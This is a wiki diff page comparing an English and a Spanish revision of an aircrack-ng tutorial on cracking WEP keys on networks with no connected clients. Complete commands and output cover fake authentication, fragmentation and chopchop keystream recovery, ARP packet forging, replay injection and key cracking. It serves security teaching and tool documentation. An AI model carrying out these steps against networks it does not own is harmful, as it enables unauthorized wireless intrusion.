User Tools

Site Tools


spanish_how_to_crack_wep_with_no_clients

Differences

This shows you the differences between two versions of the page.

Link to this comparison view

Both sides previous revisionPrevious revision
Next revision
Previous revision
Last revisionBoth sides next revision
spanish_how_to_crack_wep_with_no_clients [2007/02/23 22:19] spanishspanish_how_to_crack_wep_with_no_clients [2007/07/17 20:54] spanish
Line 1: Line 1:
 ====== Tutorial: Como crackear WEP sin clientes ====== ====== Tutorial: Como crackear WEP sin clientes ======
-Version: 1.02. de 10 de Febrero de 2007 +Version: 1.09 de 16 de Mayo de 2007\\ 
-By: darkAudax +By: darkAudax\\ 
-Video: http://video.aircrack-ng.org/noclient/+Video: http://video.aircrack-ng.org/noclient/\\ 
 +Traducción: Revisada el 17 de Julio de 2007
  
 ===== Introducción ===== ===== Introducción =====
Line 19: Line 20:
  
     * Estás usando drivers parcheados para inyección. Puedes capturar paquetes con Wireshark para comprobar si estás inyectando.     * Estás usando drivers parcheados para inyección. Puedes capturar paquetes con Wireshark para comprobar si estás inyectando.
-    * Estás físicamente suficientemente cerca para enviar y recibir paquetes del punto de acceso. Recuerda que recibir paquetes del punto de acceso no significa que los paquetes que transmitas sean recibidos por el AP. La fuerza de la señal de las tarjetas wireless generalmente es menor que la fuerza de la señal de los AP. Por lo tanto, es necesario estar cerca del AP, para que los paquetes que transmitimos sean recibidos por el AP.+    * Estás físicamente suficientemente cerca para enviar y recibir paquetes del punto de acceso. Recuerda que recibir paquetes del punto de acceso no significa que los paquetes que transmitas sean recibidos por el AP. La fuerza de la señal de las tarjetas wireless generalmente es menor que la fuerza de la señal de los AP. Por lo tanto, es necesario estar cerca del AP, para que los paquetes que transmitimos sean recibidos por el AP. Deberías confirmar que te puedes comunicar con el AP siguiendo [[http://www.aircrack-ng.org/doku.php?id=injection_test#hidden_or_specific_ssid|estas instrucciones]]
     * No hay paquetes de datos que vienen del punto de acceso. Beacons (balizas) y otros paquetes como "management frame packets" son inútiles para nuestros propósitos en este tutorial. Una forma rápida para comprobar el tráfico es ejecutar airodump-ng y ver si hay algún paquete de datos. En el caso de tener paquetes de datos capturados del punto de acceso en otras sesiones, podríamos usarlos para generar nuevo tráfico. Esto es para usuarios avanzados y este tutorial no da instrucciones detalladas para este caso.     * No hay paquetes de datos que vienen del punto de acceso. Beacons (balizas) y otros paquetes como "management frame packets" son inútiles para nuestros propósitos en este tutorial. Una forma rápida para comprobar el tráfico es ejecutar airodump-ng y ver si hay algún paquete de datos. En el caso de tener paquetes de datos capturados del punto de acceso en otras sesiones, podríamos usarlos para generar nuevo tráfico. Esto es para usuarios avanzados y este tutorial no da instrucciones detalladas para este caso.
     * El punto de acceso usa encriptación WEP abierta (open authentication). No funcionará si la autentificación es compartida (shared key authentication) (SKA). Con SKA el único método si no existen clientes es capturar el PRGA xor data con airodump-ng handshake o hacer previamente un ataque con aireplay-ng. Esto es así porque necesitas el archivo PRGA xor para hacer una falsa autenticación de forma exitosa.     * El punto de acceso usa encriptación WEP abierta (open authentication). No funcionará si la autentificación es compartida (shared key authentication) (SKA). Con SKA el único método si no existen clientes es capturar el PRGA xor data con airodump-ng handshake o hacer previamente un ataque con aireplay-ng. Esto es así porque necesitas el archivo PRGA xor para hacer una falsa autenticación de forma exitosa.
-    * Usamos la versión 0.de aircrack-ng. Si usas otra versión algunos comandos puede que se tengan que escribir de forma diferente.+    * Usamos la versión 0.de aircrack-ng. Si usas otra versión algunos comandos puede que se tengan que escribir de forma diferente.
  
 Asegurate de que cumples todas las condiciones, sino no funcionará. En los siguientes ejemplos, tendrás que cambiar “ath0” por el nombre de la interface de tu tarjeta wireless. Asegurate de que cumples todas las condiciones, sino no funcionará. En los siguientes ejemplos, tendrás que cambiar “ath0” por el nombre de la interface de tu tarjeta wireless.
 +
 +En los ejemplos, la opción "guión doble bssid" se muestra como "- -bssid". Acuérdate de borrar el espacio entre los dos guiones cuando lo utilices en la vida real. Esto tambien se aplica a "- -ivs".
  
  
Line 71: Line 74:
 El sistema nos responderá: El sistema nos responderá:
  
- Interface       Chipset         Driver +   Interface       Chipset         Driver 
-  +    
- wifi0           Atheros         madwifi-ng +   wifi0           Atheros         madwifi-ng 
- ath0            Atheros         madwifi-ng VAP (parent: wifi0) (monitor mode enabled)+   ath0            Atheros         madwifi-ng VAP (parent: wifi0) (monitor mode enabled)
  
 Puedes observar que “ath0” aparece colocada en modo monitor. Puedes observar que “ath0” aparece colocada en modo monitor.
Line 84: Line 87:
 El sistema nos responderá: El sistema nos responderá:
  
- lo        no wireless extensions. +   lo        no wireless extensions. 
-  +    
- eth0      no wireless extensions. +   eth0      no wireless extensions. 
-  +    
- wifi0     no wireless extensions. +   wifi0     no wireless extensions. 
-  +    
- ath0      IEEE 802.11g  ESSID:""  Nickname:"" +   ath0      IEEE 802.11g  ESSID:""  Nickname:"" 
-           Mode:Monitor  Frequency:2.452 GHz  Access Point: 00:09:5B:EC:EE:F2    +             Mode:Monitor  Frequency:2.452 GHz  Access Point: 00:09:5B:EC:EE:F2    
-           Bit Rate:0 kb/s   Tx-Power:15 dBm   Sensitivity=0/  +             Bit Rate:0 kb/s   Tx-Power:15 dBm   Sensitivity=0/  
-           Retry:off   RTS thr:off   Fragment thr:off +             Retry:off   RTS thr:off   Fragment thr:off 
-           Encryption key:off +             Encryption key:off 
-           Power Management:off +             Power Management:off 
-           Link Quality=0/94  Signal level=-98 dBm  Noise level=-98 dBm +             Link Quality=0/94  Signal level=-98 dBm  Noise level=-98 dBm 
-           Rx invalid nwid: Rx invalid crypt: Rx invalid frag:0 +             Rx invalid nwid: Rx invalid crypt: Rx invalid frag:0 
-           Tx excessive retries: Invalid misc:  Missed beacon:0+             Tx excessive retries: Invalid misc:  Missed beacon:0
  
 Podemos ver que ath0 está en modo monitor, en la frecuencia 2.452GHz que corresponde al canal 9 y en "Access Point" vemos la dirección MAC de nuestra tarjeta wireless. Es importante comprobar toda esta información antes de continuar, ya que sino no funcionará. Podemos ver que ath0 está en modo monitor, en la frecuencia 2.452GHz que corresponde al canal 9 y en "Access Point" vemos la dirección MAC de nuestra tarjeta wireless. Es importante comprobar toda esta información antes de continuar, ya que sino no funcionará.
Line 106: Line 109:
  
  
-=== Troubleshooting Tips ===+=== Problemas ===
  
-  *If another interface started other then ath0 then you can use that one or use "airomon-ng stop athX" where is each interface you want to stop.+  *Si tienes otra interface en modo monitor que no sea ath0, puedes usarla o escribir “airomon-ng stop athX” donde es la interface que quieres parar.
  
  
  
-==== Step 3 - Use aireplay-ng to do a fake authentication with the access point ====+==== Usar aireplay-ng para hacer una falsa autenticación con el punto de acceso ====
  
-This is a very important step.+Este es un paso muy importante.
  
-In order for an access point to accept a packetthe source MAC address must already be associated If the source MAC address you are injecting is not associated then the AP ignores the packet and sends out a "DeAuthentication" packet In this state, no new IVs are created because the AP is ignoring all the injected packets.+Para que un punto de acceso acepte un paquetela dirección MAC debe estar previamente asociadaSi la dirección MAC con la cual estas inyectando no etá asociada, el AP ignorará el paquete y enviará un paquete de desautentificaciónEn este caso, no se crearán nuevos IVs porque el AP está ignorando todos los paquetes inyectados.
  
-The lack of association with the access point is the single biggest reason why injection fails +La falta de asociación con el punto de acceso es la razón más habitual por la cual falla la inyección.
  
-To associate with an access pointuse fake authentication:+Para asociarse con un punto de accesousa el comando:
  
 aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:09:5B:EC:EE:F2 ath0 aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:09:5B:EC:EE:F2 ath0
  
-Where+Donde
-  *-1 means fake authentication + 
-  *0 reassociation timing in seconds +    *-1 significa falsa autenticación (fake authentication) 
-  *-e teddy is the wireless network name +    *0 tiempo de reasociación en segundos 
-  *-a 00:14:6C:7E:40:80 is the access point MAC address +    *-e teddy es el nombre de la red wireless 
-  *-h 00:09:5B:EC:EE:F2 is our card MAC addresss +    *-a 00:14:6C:7E:40:80 es la dirección MAC del punto de acceso 
-  *ath0 is the wireless interface name+    *-h 00:09:5B:EC:EE:F2 es la dirección MAC de nuestra tarjeta wireless 
 +    *ath0 es el nombre de nuestra interface
  
-Success looks like:+Si tenemos éxito aparecerá algo como esto:
   18:18:20  Sending Authentication Request   18:18:20  Sending Authentication Request
   18:18:20  Authentication successful   18:18:20  Authentication successful
Line 138: Line 142:
   18:18:20  Association successful :-)   18:18:20  Association successful :-)
  
-Or another variation for picky access points:+Otra variación que puede funcionar en algunos puntos de acceso:
  
   aireplay-ng -1 6000 -o 1 -q 10 -e teddy -a 00:14:6C:7E:40:80 -h 00:09:5B:EC:EE:F2 ath0   aireplay-ng -1 6000 -o 1 -q 10 -e teddy -a 00:14:6C:7E:40:80 -h 00:09:5B:EC:EE:F2 ath0
  
-Where: +Donde:
-  * 6000 - Reauthenticate very 6000 seconds.  The long period also causes keep alive packets to be sent. +
-  * -o 1 - Send only one set of packets at a time.  Default is multiple and this confuses some APs. +
-  * -q 10 - Send keep alive packets every 10 seconds.+
  
-Success looks like:+    *6000 Reautenticación cada 6000 segundos. En este periodo de tiempo se siguen enviando paquetes de sigo aquí o "keep alive packets"
 +    *-o 1 Envia solo un tipo de paquetes de cada vez. El valor por defecto es "multiple" y esto puede confundir a algunos APs. 
 +    *-q 10 Se envian paquetes de "sigo aquí" cada 10 segundos. 
 + 
 +Si tenemos éxito aparecerá algo como esto:
   18:22:32  Sending Authentication Request   18:22:32  Sending Authentication Request
   18:22:32  Authentication successful   18:22:32  Authentication successful
Line 154: Line 159:
   18:22:42  Sending keep-alive packet   18:22:42  Sending keep-alive packet
   18:22:52  Sending keep-alive packet   18:22:52  Sending keep-alive packet
-  # and so on.+  # etc....
  
-Here is an example of what a failed authentication looks like:+Ahora ponemos un ejemplo de un fallo de autenticación:
   8:28:02  Sending Authentication Request   8:28:02  Sending Authentication Request
   18:28:02  Authentication successful   18:28:02  Authentication successful
Line 169: Line 174:
   18:28:10  Sending Association Request   18:28:10  Sending Association Request
  
-Notice the "Got a deauthentication packet" and the continuous retries above Do not proceed to the next step until you have the fake authentication running correctly.+Presta atención a “Got a deauthentication packet” y los continuos intentos de asociaciónNo se puede pasar al siguiente paso hasta que funcione la falsa autenticación de forma correcta.
  
-=== Troubleshooting Tips ===+=== Problemas ===
  
-  *Some access points are configure to only allow selected MAC addresses to associate and connect If this is the caseyou will not be able to successfully do fake authentication unless you know one of the MAC addresses on the allowed list.+    *Algunos puntos de acceso están configurados para permitir únicamente una dirección MAC para asociarse y conectarseSi este es tu casono serás capaz de realizar la falsa autenticación de forma éxitosa, salvo que conozcas una de las direcciones MAC que están permitidas para poder conectarse a ese AP. Mira los problemas de filtrado MAC en [[http://www.aircrack-ng.org/doku.php?id=i_am_injecting_but_the_ivs_don_t_increase#troubleshooting_tips|este tutorial]] 
 + 
 +    *Si deseas confirmar que estás asociado de forma correcta puedes usar tcpdump y mirar los paquetesInicia una consola y escribe:
  
-  *If at any time you wish to confirm you are properly associated is to use tcpdump and look at the packets.  Start another session and... 
      
-Run: "tcpdump -n -e -s0 -vvv -i ath0"+   tcpdump -n -e -s0 -vvv -i ath0
  
-Here is a typical tcpdump error message you are looking for:+A continuación puedes ver el mensaje de error que estamos buscando:
  
    11:04:34.360700 314us BSSID:00:14:6c:7e:40:80 DA:00:09:5B:EC:EE:F2 SA:00:14:6c:7e:40:80   DeAuthentication: Class 3 frame received from nonassociated station    11:04:34.360700 314us BSSID:00:14:6c:7e:40:80 DA:00:09:5B:EC:EE:F2 SA:00:14:6c:7e:40:80   DeAuthentication: Class 3 frame received from nonassociated station
  
-Notice that the access point (00:14:6c:7e:40:80) is telling the source (00:09:5B:EC:EE:F2) you are not associated Meaning, the AP will not process or accept the injected packets.+Presta atención que el punto de acceso (00:14:6c:7e:40:80) le está diciendo a la tarjeta (00:09:5B:EC:EE:F2) que no está asociadaLo que significa que el AP no aceptará los paquetes que inyectemos.
  
-If you want to select only the DeAuth packets with tcpdump then you can use"tcpdump -n -e -s0 -vvv -i ath0 | grep DeAuth" You may need to tweak the phrase "DeAuth" to pick out the exact packets you want.+Si solo quieres seleccionar los paquetes de deautenticación con tcpdump usatcpdump -n -e -s0 -vvv -i ath0 | grep DeAuthPuedes cambiar la palabra “DeAuth” para escoger otros paquetes que quieras buscar
  
  
  
-==== Step 4 - Use aireplay-ng chopchop or fragmenation attack to obtain PRGA ====+==== Paso 4 - Usar chopchop o ataque de fragmentación para obtener PRGA ====
  
-The objective of the [[korek_chopchop|chopchop]] and [[fragmentation]] attacks is to obtain a PRGA (pseudo random genration algorithm) bit file  This PRGA is not the WEP key and cannot be used to decrypt packets Howeverit can be used to create new packets for injection The creation of new packets will be covered later in the tutorial.+El objetivo de [[korek_chopchop|chopchop]] y del [[fragmentation|ataque de fragmentación]] es obtener un archivo PRGA (del ingles "pseudo random generation algorithm" o algoritmo de generación seudo aleatoria). Este PRGA no es la clave WEP y no se puede usar para desencriptar paquetesAunquesi puede usarse para crear nuevos paquetes encriptados con la clave WEP para inyectarlosLa creación de nuevos paquetes la veremos más adelante en el tutorial.
  
-Either chopchop or fragmentation attacks can be to obtain the PRGA bit file The result is the same so use whichever one works for you The pros and cons of each attack are described on the [[aircrack-ng]] page.+Tanto chopchop como el ataque de fragmentación pueden ser usados para obtener el archivo PRGA. El resultado es el mismo, por lo que usa el que mejor te funcioneLos pros y contras de cada ataque están descritos en la página de [[aircrack-ng.es|aircrack-ng]].
  
-We will cover the fragmentation techninque first Start anther console session and run:+A continuación exponemos primero el ataque de fragmentaciónAbrimos otra consola y escribimos:
  
 aireplay-ng -5 -b 00:14:6C:7E:40:80 -h 00:09:5B:EC:EE:F2 ath0 aireplay-ng -5 -b 00:14:6C:7E:40:80 -h 00:09:5B:EC:EE:F2 ath0
  
-Where+Donde
-  *-5 means the fragmentation attack + 
-  *-b 00:14:6C:7E:40:80 is the access point MAC address +    *-5 significa ataque de fragmentación 
-  *-h 00:09:5B:EC:EE:F2 is the MAC address of our card and must match the MAC used in the fake authentication +    *-b 00:14:6C:7E:40:80 es la dirección MAC del punto de acceso 
-  *ath0 is the wireless interface name+    *-h 00:09:5B:EC:EE:F2 es la dirección MAC de nuestra tarjeta wireless y debe coincidir con la dirección MAC usada en la falsa autenticación 
 +    *ath0 es el nombre de nuestra interface
  
-The system will respond:+La respuesta que obtendremos será
  
    aireplay-ng -5 -b 00:14:6C:7E:40:80 -h 00:09:5B:EC:EE:F2 ath0                     aireplay-ng -5 -b 00:14:6C:7E:40:80 -h 00:09:5B:EC:EE:F2 ath0                 
Line 228: Line 235:
            Use this packet ? y            Use this packet ? y
  
-When a packet from the access point arrivesenter "y" to proceed You may need to try a few to be successful.+Cuando recibamos un paquete del punto de accesoescribe “y” para continuarPuede que sea necesario probar unos pocos paquetes para tener éxito.
  
-When successful, the system reponds:+Si tenemos éxito aparecerá algo como esto
  
    Saving chosen packet in replay_src-0203-180328.cap    Saving chosen packet in replay_src-0203-180328.cap
Line 246: Line 253:
    Now you can build a packet with packetforge-ng out of that 1500 bytes keystream    Now you can build a packet with packetforge-ng out of that 1500 bytes keystream
  
-Success!  The file "fragment-0203-180343.xor" can then be used in the next step to generate an arp packet.+ Éxito! El archivo “fragment-0203-180343.xor” lo podremos usar en el siguiente paso para generar un paquete arp.
  
-If the fragmentation attack was not successfulyou can then try the chopchop technique next Run:+Si con el ataque de fragmentación no hemos tenido éxitopodemos probar la técnica chopchop. Para ello ejecuta:
  
 aireplay-ng -4 ath0 -h 00:09:5B:EC:EE:F2 aireplay-ng -4 ath0 -h 00:09:5B:EC:EE:F2
  
-Where: +Donde:
-  *-4 means the chopchop attack +
-  *-h 00:09:5B:EC:EE:F2 is the MAC address of our card and must match the MAC used in the fake authentication +
-  *ath0 is the wireless interface name+
  
-The system responds:+    *-4 significa ataque chopchop 
 +    *-h 00:09:5B:EC:EE:F2 es la dirección MAC de nuestra tarjeta wireless y debe coincidir con la dirección MAC usada en Dla falsa autenticación 
 +    *ath0 es el nombre de nuestra interface 
 + 
 +La respuesta que obtendremos será:
  
         Read 165 packets...         Read 165 packets...
Line 276: Line 284:
    Use this packet ? y    Use this packet ? y
  
-You respond "y" above and the system continues.+Contesta "y” y el proceso continuará.
  
    Saving chosen packet in replay_src-0201-191639.cap    Saving chosen packet in replay_src-0201-191639.cap
Line 341: Line 349:
    Completed in 21s (2.29 bytes/s)    Completed in 21s (2.29 bytes/s)
  
-Success The file "replay_dec-0201-191706.xor" above can then be used in the next step to generate an arp packet.+FantásticoEl archivo “replay_dec-0201-191706.xor” lo podremos usar en el siguiente paso para generar un paquete arp.
  
-=== Helpful Tips ===+=== Pequeñas ayudas ===
  
-  *Be sure the packet is 68 or more bytes otherwise you may not have enough PRGA data to subsquently generate a packet The PRGA captured has to equal or greater then the packet length we want to generate+    *Asegúrate de que el paquete es de 68 o más bytes porque sino no tendrás suficientes datos PRGA para generar el paqueteEl PRGA capturado tiene que ser igual o mayor que la longitud del paquete que queremos generar
-  *At home, to generate some packets to force chopchop to start, ping a non-existant IP on your network This forces an arp to be broadcast and this will show up in chopchop to be used+    *Para generar algunos paquetes para forzar el comienzo de chopchop, haz ping a una IP inexistente de tu redEsto forzará que el AP emita un "arp broadcast" y este aparecerá en chopchop para ser usado
-  *You can check decrypted packet by running "tcpdump -n -vvv -e -s0 -r replay_dec-0201-191706.cap" In our example above:+    *Puedes comprobar el paquete desencriptado ejecutando “tcpdump -n -vvv -e -s0 -r replay_dec-0201-191706.capEn nuestroejemplo:
    reading from file replay_dec-0201-191706.cap, link-type IEEE802_11 (802.11)    reading from file replay_dec-0201-191706.cap, link-type IEEE802_11 (802.11)
 19:17:06.842866 0us DA:Broadcast BSSID:00:14:6c:7e:40:80 SA:00:40:f4:77:e5:c9 LLC, dsap SNAP (0xaa), ssap SNAP (0xaa), cmd 0x03: oui Ethernet (0x000000), ethertype ARP (0x0806): arp who-has 192.168.1.12 tell 192.168.1.1 19:17:06.842866 0us DA:Broadcast BSSID:00:14:6c:7e:40:80 SA:00:40:f4:77:e5:c9 LLC, dsap SNAP (0xaa), ssap SNAP (0xaa), cmd 0x03: oui Ethernet (0x000000), ethertype ARP (0x0806): arp who-has 192.168.1.12 tell 192.168.1.1
-  *If something happens part way through chopchop, you can reuse the source packet by entering "aireplay-ng -4 ath0 -h 00:09:5B:EC:EE:F2 -r replay_src-0201-191639.cap"The replay source file is noted when chopchop starts+    *Puedes reusar el paquete capturado ejecutando “aireplay-ng -4 ath0 -h 00:09:5B:EC:EE:F2 -r replay_src-0201-191639.capEl nombre del archivo aparece cuando se inicia chopchop. 
-  *Taking the previous tip furtherif you have a capture file from another session, you can use it as input "aireplay-ng -4 ath0 -h 00:09:5B:EC:EE:F2 -r capture-from-some-other-time.cap"+    *Si tienes un archivo de capturas de una sesión anteriorpuedes usarlo con el comando “aireplay-ng -4 ath0 -h 00:09:5B:EC:EE:F2 -r captura-sesión-anterior.cap
  
-=== Troubleshooting Tips === 
  
-  * If the first packet you select does not work, then try a few others. Sometimes it takes more then one try to be successful with either attack. +=== Problemas ===
-  * The chopchop attack will not be successful on some access points. If this happens, move onto the fragmentation attack.  And vice versa. +
-  * Make sure you are properly associated. To check this, follow the tcpdump instructions in step 2.+
  
 +      *Si el primer paquete que has seleccionado no funciona, prueba unos pocos más. Algunas veces hay que intentarlo varias veces para conseguir tener éxito en cualquiera de los ataques.
 +      *El ataque chopchop no funciona en algunos puntos de acceso. Si esto ocurre, prueba el ataque de fragmentación. Y viceversa.
 +      *Asegurate de que estás correctamente asociado al AP. Para comprobarlo sigue las instrucciones del paso 2 con tcpdump.
  
-==== Step 5 - Use packetforge-ng to create an arp packet ==== 
  
-In the previous step, we obtained PRGA.  It does not matter which attack generated the PRGA, both are equal.  This PRGA is stored in the files ending with "xor" We can then use this PRGA to generate a packet for injection.  We will be generating an arp packet for injection.  The objective is to have the access point rebroadcast the injected arp packet.  When it rebroacasts it, a new IV is obtained.  All these new IVs will ultimately be used to crack the WEP key. 
  
-But first, lets generate the arp packet for injection by entering:+ 
 +==== Paso 5 - Usar packetforge-ng para crear un paquete arp ==== 
 + 
 + En el paso anterior hemos obtenido el PRGA. No importa con que ataque hemos generado el PRGA. Este PRGA se encuentra en los archivos con extensión “xor”. Podemos entonces usar este PRGA para generar un paquete para inyectar. Generaremos un paquete arp para la inyección. El objetivo es que el punto de acceso reenvie continuamente el paquete arp inyectado. Cuando lo reenvie obtendremos un nuevo IV (vector de inicialización). Todos estos IVs los usaremos para obtener la clave WEP. 
 + 
 +Pero primero vamos a generar el paquete arp para la inyección, escribiendo:
  
 packetforge-ng -0 -a 00:14:6C:7E:40:80 -h 00:09:5B:EC:EE:F2 -k 255.255.255.255 -l 255.255.255.255.255 -y fragment-0203-180343.xor -w arp-request packetforge-ng -0 -a 00:14:6C:7E:40:80 -h 00:09:5B:EC:EE:F2 -k 255.255.255.255 -l 255.255.255.255.255 -y fragment-0203-180343.xor -w arp-request
  
-Where: +Donde:
-  *-0 means generate an arp packet +
-  *-a 00:14:6C:7E:40:80 is the access point MAC address +
-  *-h 00:09:5B:EC:EE:F2 is MAC address of our card +
-  *-k 255.255.255.255 is the destination IP (most APs respond to 255.255.255.255) +
-  *-l 255.255.255.255.255 is the source IP (most APs respond to 255.255.255.255) +
-  *-y fragment-0203-180343.xor is file to read the PRGA from +
-  *-w arp-request is name of file to write the arp packet to+
  
-The system will respond:+    *-0 significa generar un paquete arp 
 +    *-a 00:14:6C:7E:40:80 es la dirección MAC del punto de acceso 
 +    *-h 00:09:5B:EC:EE:F2 es la dirección MAC de nuestra tarjeta wireless 
 +    *-k 255.255.255.255 es la IP de destino (la mayoría de los APs responden a 255.255.255.255) 
 +    *-l 255.255.255.255.255 es la IP de origen (la mayoría de los APs responden a 255.255.255.255) 
 +    *-y fragment-0203-180343.xor es el archivo del que se  leerá el PRGA 
 +    *-w arp-request es el nombre del archivo en el que se guardará el paquete arp 
 + 
 +La respuesta que obtendremos será
  
    Wrote packet to: arp-request    Wrote packet to: arp-request
  
-=== Helpful Tips ===+=== Pequeñas ayudas ===
  
-  *After creating the packetuse tcpdump to review it from a sanity point of view See below.  It looks good!+  *Despues de crear el paqueteusa tcpdump para revisarloEscribe
  
 tcpdump -n -vvv -e -s0 -r arp-request            tcpdump -n -vvv -e -s0 -r arp-request           
Line 390: Line 402:
    10:49:17.456350 WEP Encrypted 258us BSSID:00:14:6c:7e:40:80 SA:00:09:5b:ec:ee:f2 DA:Broadcast Data IV: 8f Pad 0 KeyID 0    10:49:17.456350 WEP Encrypted 258us BSSID:00:14:6c:7e:40:80 SA:00:09:5b:ec:ee:f2 DA:Broadcast Data IV: 8f Pad 0 KeyID 0
  
-Since you are testing against your own AP (you are, right?), then decrypt the packet and ensure it is correct These steps are not requiredthey just prove to yourself that you have generated the correct packet.+Como estamos probando con nuestro propio AP (si no es así NO CONTINUES!), desencriptamos el paquete y nos aseguramos de que es correctoEste paso no es necesariosolo sirve para comprobar que hemos generado un paquete correcto. 
 + 
 +Escribimos: "airdecap-ng -e teddy -w <tu clave WEP> arp-request". Y para ver el paquete desencriptado: "tcpdump -n -r arp-request-dec"Deberíamos observar algo como esto: 
  
-Decrypt the packet: airdecap-ng -e teddy -w <put your WEP key here> arp-request 
-View the decrypted packet: tcpdump -n -r arp-request-dec 
-It should be something like: 
      
    reading from file arp-request-dec, link-type EN10MB (Ethernet)    reading from file arp-request-dec, link-type EN10MB (Ethernet)
    10:49:17.456350 arp who-has 255.255.255.255 tell 255.255.255.255    10:49:17.456350 arp who-has 255.255.255.255 tell 255.255.255.255
  
 +==== Paso 6 - Iniciar airodump-ng ====
  
-==== Step 6 -  Start airodump-ng ==== +Abrir otra consola para capturar los IVs generadosY escribir:
- +
-Open another console session to capture the generated IVs.  Then enter:+
  
-airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 --ivs -w capture ath0+airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w capture ath0
  
-Where: +Donde:
-  *-c 9 is the channel for the wireless network +
-  *--bssid 00:14:6C:7E:40:80 is the access point MAC address.  This eliminate extraneous traffic. +
-  *--ivs specfifies that you only want to capture the IVs.  This keeps the file as small as possible. +
-  *-w capture is file name prefix for the file which will contain the IVs. +
-  *ath0 is the interface name.+
  
 +    *-c 9 es el canal de la red wireless
 +    *– -bssid 00:14:6C:7E:40:80 es la dirección MAC del AP. Esto elimina el trafico de otras redes.
 +    *– -ivs especifica que solo capturaremos IVs. Así el archivo será muy pequeño. Pero no uses esta opción si quieres utilizar "aircrack-ng -z".
 +    *-w capture es el nombre del archivo en el que guardaremos los IVs.
 +    *ath0 es el nombre de nuestra interface.
  
-==== Step 7 -   Inject the arp packet ====+==== Paso 7 - Inyectar el paquete arp ====
  
-Using the console session where you generated the arp packetenter:+ Usando la consola en la que generamos el paquete arp, escribimos:
  
 aireplay-ng -2 -r arp-request ath0 aireplay-ng -2 -r arp-request ath0
  
-Where: +Donde:
-  *-2 means use interactive frame selection +
-  *-r arp-request defines the file name from which to read the arp packet +
-  *ath0 defines the interface to use+
  
-The system will respond:+    *-2 significa que usamos el modo interactivo para seleccionar el paquete 
 +    *-r arp-request especificamos el nombre del archivo con el paquete arp 
 +    *ath0 es el nombre de nuestra interface 
 + 
 +Obtendremos la siguiente respuesta:
  
         Size: 68, FromDS: 0, ToDS: 1 (WEP)         Size: 68, FromDS: 0, ToDS: 1 (WEP)
Line 441: Line 453:
         Use this packet ? y         Use this packet ? y
  
-Enter "y" to use this packet The system responds by showing how many packets it is injecting and reminds you to start airodumump if it has not already been started:+Escribimos “y” para usar este paqueteVeremos cuantos paquetes estamos inyectando y se nos recuerda que iniciemos airodump-ng si no lo hemos hecho todavía:
  
    Saving chosen packet in replay_src-0204-104917.cap    Saving chosen packet in replay_src-0204-104917.cap
Line 448: Line 460:
    End of file.    End of file.
  
-While this command is successfully runningthe airodump-ng screen will look similar to:+Mientras este comando se está ejecutando de forma exitosaen la ventana de airodump-ng  veremos algo similar a esto:
  
    CH  9 ][ Elapsed: 16 s ][ 2007-02-04 11:04     CH  9 ][ Elapsed: 16 s ][ 2007-02-04 11:04 
Line 460: Line 472:
     00:14:6C:7E:40:80  00:09:5B:EC:EE:F2   29         2707                                                          00:14:6C:7E:40:80  00:09:5B:EC:EE:F2   29         2707                                                     
  
-You will notice that only one access point is being display since we included an airodump-ng filter to limit the capture to single BSSID.  Also notice that the station packets are roughly equal to the BSSID data packets This means injection is working well Also notice the data rate of 336 packets per second which is also an indicator that the injection is working well This is a pretty "ideal" injection scenario.+Puedes observar que solo hay un punto de acceso puesto que hemos incluido en airodump-ng el filtro para limitar la captura un único BSSID. Tambien observa que los paquetes de la tarjeta son aproximadamente los mismos que los paquetes (data) del BSSID. Esto significa que la inyección está funcionando bien y se pierden pocos paqueteslTambien observa la velocidad de inyección (#/s) de 336 paquetes por segundo, lo cual es un indicador de que la inyección está funcionando muy bienEsta es una situación "ideal" de inyección.
  
-=== Troubleshooting Tips ===+=== Problemas ===
  
-  *If the BSSID data packets are not increasing make sure you are still associated with the access point To do thisfollow the tcpdump instructions in step 2.+  *Si los paquetes del BSSID (data) no aumentan asegurate de que estas todavía asociado con el punto de accesoPara hacer estomira las instrucciones sobre tcpdump en el paso 2.
  
 +==== Paso 8 - Ejecutar aircrack-ng para obtener la clave WEP ====
  
-==== Step 8 - Run aircrack-ng to obtain the WEP key ====+Inicia otra consola y escribe:
  
-Start another console session and enter:+aircrack-ng -z -b 00:14:6C:7E:40:80 capture*.cap
  
-aircrack-ng *.ivs -b 00:14:6C:7E:40:80+Donde:
  
-Where+    *-z significa que se use el método PTW para obtener más rápido la clave WEP 
-  **.ivs selects all files ending in "ivs". +    *capture*.cap selecciona todos los archivos que comienzan por "capture" y con extensión “cap”. 
-  *-b 00:14:6C:7E:40:80 selects the one access point we are interested in+    *-b 00:14:6C:7E:40:80 selecciona el punto de acceso en el que estamos interesados 
 + 
 +Puedes ejecutar aircrack-ng mientras capturas paquetes. En poco tiempo, verás la clave WEP. Usando el método PTW, necesitarás alrededor de 20,000 paquetes de datos para una clave de 64 bit y 40,000 para claves de 128 bit. Recuerda que el métodoPTW solo funciona con paquetes ARP. Como este tutorial solo cubre este tipo de paquetes no tendrás problema ninguno. El otro requerimiento es que has de capturar con airodump archivos *.cap, lo que significa que no puedes usar laopción "- -ivs"
 + 
 +Si no usas la opción "-z", se aplicará el método FMS/Korek. Necesitarás aproximadamente 250,000 IVs para una clave WEP de 64 bit y 1,500,000 IVs para claves de 128 bit. Esto es aproximado y hay muchas variables que influyen en el número de IVs necesarios para obtener la clave WEP.  
 + 
 +Problemas: 
 + 
 +  *Algunas veces es recomendable probar varias técnicas para obtener la clave WEP rápidamente. Prueba la opción “-n” para fijar la longitud de la clave (por ejemplo -n 64). Usa “-f” y prueba diferentes "fudge factors". Usa “-k” y prueba a desabilitar los métodos korek. 
 + 
 +===== Solución alternativa ===== 
 + 
 +Existe un pequeño engaño que simplifica el crackeo de la clave WEP sin clientes.  Básicamente consiste en recoger cualquier paquete "broadcast" del punto de acceso y convertirlo para que el punto de acceso genere un nuevo IV. 
 + 
 +Es importante que tengas en cuenta que si usas este truco, no podrás utilizar la opción "-z" del método PTW con aircrack-ng.  Esto se debe a que el método PTW requiere paquetes arp y de esta forma no los generamos. 
 + 
